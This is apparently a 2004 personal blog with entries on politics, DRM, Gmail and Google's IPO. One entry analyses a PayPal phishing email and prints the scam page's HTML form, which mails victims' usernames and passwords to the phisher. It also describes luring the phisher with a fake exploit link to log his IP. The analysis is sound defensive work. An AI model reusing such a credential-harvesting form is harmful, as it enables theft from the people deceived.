Thu May 20 21:56:33 BST 2004

• Build stackless
• Write text on cap systems
• Write text on why javascript isn't evil
• Get gcal working
• XML rant

(this is more of a personal todo than anything else. Nothing to see here, move along)

Sun May 9 10:56:29 BST 2004

Dogs can't vote!
Not directly

If you're American this is your task for today. Oi! Come back. I will hunt you down with my IP address guided custard pie if you don't.

• Read this bill. If you don't agree with it, you're probably probably using this blog as an example of Communist propaganda - so I guess I've lost you. If this is the case then you can go now.
• Lookup your representative
• Lookup their contact details. Note them down - it's always useful
• This is a list of people on the subcommittee that has to vote this bill up on the 12^th. If your rep is on the subcommittee then phone or write (with paper) to them. If you're writing then lay it out properly with your address and signature and everything. Keep it short and don't rant.
• If you phone them, you have to speak with the staff member who is dealing with this bill (or the general IP law staffer).
• You can both phone and write, of course.
• You can contact you rep even if they aren't on the subcommittee. You can also contact reps who are, even if they aren't your rep.
• Form letters are bad - try to write it yourself.

When you have done this, email me or post a comment and I'll order the homing custard pie to self destruct.

Fri May 7 14:52:37 BST 2004

The future of music cannot include record labels as we have them today.

If you need weird passport photos done (e.g. special sized US NI visa photos) - go to Passport Photo Services on Oxford St. No hassle, very quick and such weird requests handled without issue.

And did you know that Virgin on Tottenham Court Rd has a real music hardware section on the bottom floor? I'm pretty sure that it's fairly new, but they sell proper desks (Midas and Yamaha) and mics etc. It's all really expensive - but could be useful to have a look at before buying it from somewhere sensible.

Mon May 3 21:35:42 BST 2004

The Quest for Omega - highly recommended

Sun May 2 13:05:26 BST 2004

I was bored last night (you know, revision, makes you do strange things...). So I actually opened one of those scam PayPal emails:

It has come to our attention that your PayPal account information needs to be updated as part of our continuing commitment to protect your account and to reduce the instance of fraud on our website. If you could please take 5-10 minutes out of your online experience and update your personal records you will not run into any future problems with the online service.

The link text is at www.paypal.com, but the destination is http://210.120.9.236/paypal/login.htm. That's a solaris box running every service under the sun. I've no doubt that it's a hacked box, so I've emailed the netblock owner (no answer). I also emailed the netblock owner for the host where the email came from - pretty prompt answer from them (they are looking into it). But let's have a look at the HTML from the scam page (which looks identical to a real PayPal page):

<FORM action=http://www.i-st.net/cgi-bin/web2mail.cgi method=post><INPUT type=hidden value=mirub@linuxmail.org name=.email_target> <INPUT type=hidden value=username-password name=.mail_subject> <INPUT type=hidden value=http://210.120.9.236/paypal/loginloading.htm name=.thanks_url>

Basically, it's emailing him via linuxmail.org (I've emailed linuxmail and told them this). But that's about as far as I can go. I can't find out who is reading that email account. Or can I?

Subject: New remote root exploit for OpenSSH 3.7.x
To: mirub@linuxmail.org
From: xyz@abc.com

I hear that you're an elite hacker. I'd like to share exploits with you, so as
a gesture of good faith (to get the ball rolling) this exploit is doing the
blackhat rounds but hasn't hit the mainstream yet. Many juicy boxes are running
vulnerable sshds:

http://www.doc.ic.ac.uk/~guest01/openssh-xploit.c

Hope to hear from you...

And the contents of http://www.doc.ic.ac.uk/~guest01/openssh-xploit.c:

Well, that'll be your IP in the weblogs.

Cheers.

And indeed:

62.162.228.219 - - [02/May/2004:11:54:26 +0100] "GET
/~guest01/openssh-xploit.c HTTP/1.1" 200 51
"http://adsfree.linuxmail.org/scripts/mail/mesg.mail?folder=INBOX&order=Newest&
mview=a&mstart=1&.popup=0&msg_uid=1083452662&mprev=1083452665&mnext=1083452657"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"

inetnum:      62.162.224.0 - 62.162.255.255
netname:      MTnet-ADSL_subnet
descr:        ADSL subnet
descr:        Skopje, Macedonia
country:      MK

Very little chance of getting him in Macedonia. Oh well, at the very least he probably wet himself

Sun May 2 12:39:12 BST 2004

As everyone on the planet knows by now (it was even front page news on the Evening Standard), Google is floating. This means that I'm probably going to be working there when they float - which should be an interesting experience. I'll come in one day and the net worth of a decent number of people there will have jumped overnight.

I really hope that this doesn't mess the company up too much. They aren't perfect, but (as I hope to find out) everyone there says that it's a pretty special place. However, it has the coolest S1 filing ever. Brin and Page are staying and make it very clear that they are going to run the company their way. Also:

the exact value of its planned offering is $2,718,281,828 dollars, which some would immediately recognize as the mathematical constant e.

Nice.

Fri Apr 30 10:02:27 BST 2004

Your daily dose of What the Fuck?

Mon Apr 26 17:51:48 BST 2004

Experiment possibly discounts Many Worlds and Copenhagen interpretations.

Frankly, wow. Gmail is very cool. In fact I possibly prefer it to mutt, my usual mailreader - but give me a couple of days before I pronounce on that.

Gmail is the first web application that actually deserves the name. For example, the inbox page has 2 lines of HTML, all the rest looks like:

D(["v","108424e99f735b5"]
);
D(["i",0]
);
D(["qu","0 MB","1000 MB","0%","#006633"]
);
D(["ds",2,0,0,0,0,0]
);

Basically, there's a master Javascript page which parses all that and spits out HTML, client side. That also means that the interface is very fast for the most part. A round-trip to the gmail server takes a while as ever (<1 second) but many operations are just javascript. And the vi key bindings 'j', 'k' and '/' work

Fri Apr 23 16:11:35 BST 2004

All my outgoing mail should be signed by my non-secure key. (Unless I know you use Windows or some other crap client that can't cope with RFCs). My old non-secure key just expired, so here is the new one (signed by my master key):

(Also availible on all good keyservers soon)

pub  1024D/5FD38350 2004-04-23 Adam Langley (Non secure signing key) 
sub  1024g/A51F1F5E 2004-04-23 [expires: 2005-04-23]

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.2.4 (GNU/Linux)

mQGiBECJMIERBACwCG/dJXNvQmBYCc64/HAIhDLXI75tUe+mxqvlIRCPPVqTFWd7
jolhGg1BrHI+v1QH+7ERpcr3vBgpvWkhRho1FBEvhyLR6Mdfvb4T06jj77SLikRy
XvaZfPPnfHhNXdjxEbLe57hPH7dSIrXP21AIZizH9OnBwfvyVA7E5mITiwCgxzxF
fndrbEAsU2cnjd3cd4T0o7kD/2kq4UX33yKWLl+WiU+Q3eXAorWms0JwDAzCskG4
wB3fvj7jVSHkuRAd4zHFPqxE155rr30MsY572mFO27EYFI4ZioubVVVZv3pN5V+3
Hy2np+xPXBtwNir0GB/6ifnPsmW6uxe9X2T64D89cNfuisoEJ+zWBy2xzwyzEV1S
EQZTA/40iwLN9MgHm8NIMRNQgQJvGoJZ2BKgSsFWtTL6lbeWNAvOKRlD4jpS0B6D
xBdTDjqrlaQIm8OYZ13LRY24tY035xAHv56zHqBGP7Tg8T3SyRPrvpwa4zKI8giV
8k/75Va2yMliQIsv2xfxbIYkscDX6QRGzrF1gNUbdiJGLTJBY7Q+QWRhbSBMYW5n
bGV5IChOb24gc2VjdXJlIHNpZ25pbmcga2V5KSA8YWdsQGltcGVyaWFsdmlvbGV0
Lm9yZz6IZAQTEQIAJAUCQIkwgQIbAwUJAeEzgAYLCQgHAwIDFQIDAxYCAQIeAQIX
gAAKCRBYHZWLX9ODUC0CAJ9lUzvCra8GdYxGhsyzai2vVUctYQCfXLFo4qZHrXhQ
jxUrBrBLZ7xbY3yITAQTEQIADAUCQIkw0QWDAeEzMAAKCRDNpVLfLLY9YB4aAJsF
V8zYo+gUsWc+awch1TKr0rORkwCeNGyX+HDQ6RBBy64XJQtFnVaYwLy5AQ0EQIkw
hRAEAM7C1brA5o31SGVLxd2wtPLdHyhyt7Il1HmCXNP6uUaXKN0Z8xbCj0mOTtsz
HjzBNo7UPInsAkaJOz/bo+iXcCX5X/hgKNljsuhHOP5mVtedvEBCfCFCHAKyHuQy
YJzkQIkgvPWH+YIqn7LNSVjJ0/ZK9jGa2sB1OwLEwV64nWFnAAMFA/sHM9+UvhIY
L/LU3rOwRIMXhJolm4RHsem/Xty9ZTQT29CoPqeJdVUkhoVxOc1s3DIUUVegFNxV
UIEPfs8cqin4HtEBaxl+howHD7AOzH03HRvtBzu0mZ+LC2YuIZxGRJaN0vKMx9m0
NRh5FSGnWXd6dUdZQtnh7cz3CP2ujvYAxYhPBBgRAgAPBQJAiTCFAhsMBQkB4TOA
AAoJEFgdlYtf04NQpcMAnR8qmZepHXtFyBvaMMBXXc8krdvwAJ9u6fkkiDbwVYuD
7v0Wldd93FOdQA==
=oxRB
-----END PGP PUBLIC KEY BLOCK-----

Thu Apr 22 11:16:29 BST 2004

I like the Guardian, it's generally a pretty good newspaper. But it really does print some utter crap sometimes.

Joyti De-Laurey will shortly be sentenced for stealing several million pounds from some City squillionaires. But if there was any justice in this world, Joyti would not only be a free woman, she'd be given a medal for services to the community.

So, it seems, robbing the rich and giving to the poor is not only ok within the confines of a representative democratic tax system, it's ok all the time. So I assume that he leaves his front door unlocked at night so that all the homeless poor people can rightfully rob him without risking hurting themselves while forcing the door.

Somehow the writer manages the double-think that the victims (oh and, by the way, As crimes go, this was a victimless one) are both lazy and foolish (Fools and their money are soon parted) and hardworking (The trio were far too busy with their 6am meetings and long-distance business trips) at the same time.

The writer also has an interesting grasp of economic reality: [their money] was just lying dormant in their accounts, doing nothing. I wonder if he has ever wondered where bank loans for buying his house, or starting the local businesses which serve his needs comes from. He might like to reflect that there's a word for when banks stop lending money - recession.

It's just disappointing that writers with such a lack of rationality get printed in serious national press.

Tue Apr 20 11:26:05 BST 2004

Still waiting for the draft ID cards bill, but if you want a little insight from New Labour try this from Sion Simon (Labour MP):

I mean this civil liberties business I don't understand, what civil liberties implications, it's nonsense. I mean if you've done nothing wrong what are you frightened of?

(BBC R4, Any Questions, 9^th April 2004)

So, ladies and gentlemen. Have an ID card - if you've done nothing wrong you have nothing to fear.

Tue Apr 20 10:51:58 BST 2004

US weapons in space [via JWZ].

highly detailed plans for a whizbang space arsenal led by the "Rods From God" -- bundles of tungsten rods fired from orbiting platforms, hurtling toward earth at 3,700 meters per second, accurate within a range of 8 meters and able to destroy even the most hardened targets

So, 3700 m/s gives 6.8 MJ/kg of energy. One tonne of TNT is 4612 MJ. So, in order to deliver a 1 tonne explosion they need to launch 674 kg of the stuff. For a one shot weapon. Now, the shuttle costs $50,000/kg to low earth orbit (source). That's $34 million dollars per megatonne. Or $30 million dollars per Fallujah strike, if you like.

Sun Apr 18 19:28:27 BST 2004

Well, we're going to have a referendum on the EU Constitution then. That means that I've got to read the damm thing and it's a huge tangle of politically correct nonsense for the most part.

(For those who don't know how UK policy is announced these days: First there's the oblique comment (Blair on Radio 4 a few days ago), then there's the leak to the press (just now) then there's the full announcement (this week I expect).

Tue Apr 13 23:05:47 BST 2004

Well, it's probably good for revision that I'm going to cut right down on typing now since I'm starting to feel the first signs of RSI. Probably because I have a crappy, self-taught typing style.

I'm wondering about switching to Dvorak, but I've just been playing with it (my version of it) and it doesn't seem to help any. If anything, it's worse.

Wed Apr 7 15:03:03 BST 2004

Here's a time-lapse video of the setup and strike of the Medics Fashion Show (you can see the photos here). It's WMV format (I didn't do it!) but it's not fuckwared and my install of mplayer can cope with it.

dramsoc.wmv (50M)

Tue Apr 6 18:20:19 BST 2004

Tue Apr 6 11:25:30 BST 2004

British people can now live happy in the knowledge that the Criminal Justice Act (2003) came into force yesterday:

They enable police to retain fingerprints and DNA samples from anyone arrested - whether or not they are charged.

The Home Office will look at whether police should be able to [drug] test all suspects arrested for offenses such as burglary and theft which are considered as "driving up" drug abuse.

So what the Police want is a national DNA and fingerprint database, by the back door. If they actually tried to announce it, there would be dissent - and Labour are fed up with that after the whole tuition fees saga. So, slowly, they are going to build it anyway.

You have to wonder how difficult it would be to setup a new political party. And `difficult' means `money' in this case. I think a 30-second TV slot would cost you about 250K, so 10M wouldn't even be a large advertising budget. I'm sure 5M would slip away all too quickly in other costs.

In the 1997/8 fiscal year, corporate donations for the Conservatives (the biggest number) was about 2.8M - so one would need some significantly more generous investors.

Hmm...

Tue Apr 6 10:15:54 BST 2004

Looks like SourceForge have pulled the source to Playfair [/. story].

See, as an act of civil disobedience against those who believe that code should be suppressed to enforce a huge increase in copyright powers I wish I had the source code to Playfair so that lots of people could download it and prove how futile pulling the code was.

But all I have are these two random, 326K files. I wonder what I could do with those...

Update: seriously, you people who can't figure it out are too dumb to use the program anyway!

Fri Apr 2 21:52:39 BST 2004

Janus is Microsoft's new DRM (fuckware) system. The details are, frankly, unimportant - just only need to know this much:

Janus would add a hacker-resistant clock to portable music players for files encoded in Microsoft's proprietary Windows Media Audio format. That in turn would help let subscription services such as Napster put rented tracks on portable devices--something that's not currently allowed. Fans of portable players could then pay as little as $10 a month for ongoing access to hundreds of thousands of songs, instead of buying song downloads one at a time for about a dollar a piece.

This is wrong. This is bad. This is evil. This is why:

Control

This requires is trusted clock and this is a form of client-side security. That doesn't work, this has been known for many years. Unfortunately, these companies will and have used the legal system to try and make it work.

Of course, content providers can only give music to trusted hardware - hardware that they trust to expire music. This means that the number of companies that can manufacture such hardware is very limited. It also means that since you have to go online to "renew" your music that they can disable any hardware at any time by not renewing.

If you read the license agreement this will be one of their legal rights.

No hardware manufacturer is going piss these people off on pain of a whole lot of angry customers or the loss of a manufacturing license. So they can invent any rights for themselves that they wish and it's protected by law (DMCA/EUCA).

What rights? Well, at the moment they have invented the right to stop you fast-forwarding the legal warning/trailers on some DVDs (with compliant players). They lost control of the DVD player market so this isn't enforced. You can bet they're not going to make that mistake again.

Public Domain

Remember that after a certain number of years the government granted monopoly on a given work expires? Remember that last time you put on a Shakespeare play that you didn't have to pay his family/estate anything?

Fine and dandy because when the copyright on these works expires you won't be able to play them anymore.

Their control of this is enforced by hardware and never expires.

History

Go down to your local library. You can probably lookup editions of the local paper going back decades. This is our history.

So when your TV news is subscription. And your paper is the digital edition. And your downloaded magazines are rented. Where's your history?

This is wrong. This is bad. This is evil.

Thu Apr 1 14:52:15 BST 2004

Lessig's new book is out in both dead-tree format and electronic, under a CC license.

That's the good news. On the other hand...

SciAm has published this, an interview with "the father of MP3" from which I'll pull a few quotes:

The culture of theft that turns around MP3 is detestable.

Misuse of the word theft in the usual RIAA-newspeak way.

I don't see [iTunes etc] as a solution in the long run, because they put too many limits on the users.

Ok, good

What we need is a system that guarantees the protection of copyrights but at the same time is completely transparent and universal. With the Digital Media Project [DMP] we are working to develop a format that meets these requirements.

For example, you could play a specific title until a certain date, or you could buy a subscription allowing you to play anything you want for a given period.

the algorithms used for copyright protection don't come as hardware but as software, so that you can update them with an Internet or wireless connection if they are cracked.

Hmm, I'm betting that this `father of MP3' is a manager. It would take years of training to come out with such wooly worded crap. "It's open" yet you can be time limited. "It's not-crack proof" yet people will (willingly?) download updates to `fix' their players.

And their website is, as expected, full of utter rose-tinted rubbish.

Seriously, how do people get away with not putting a single hours thought into these systems?.

It turns out that Apple have very neatly managed to use the RIAA's stupidity against them by having a DRM free service and just telling the RIAA that it's protected. Genius.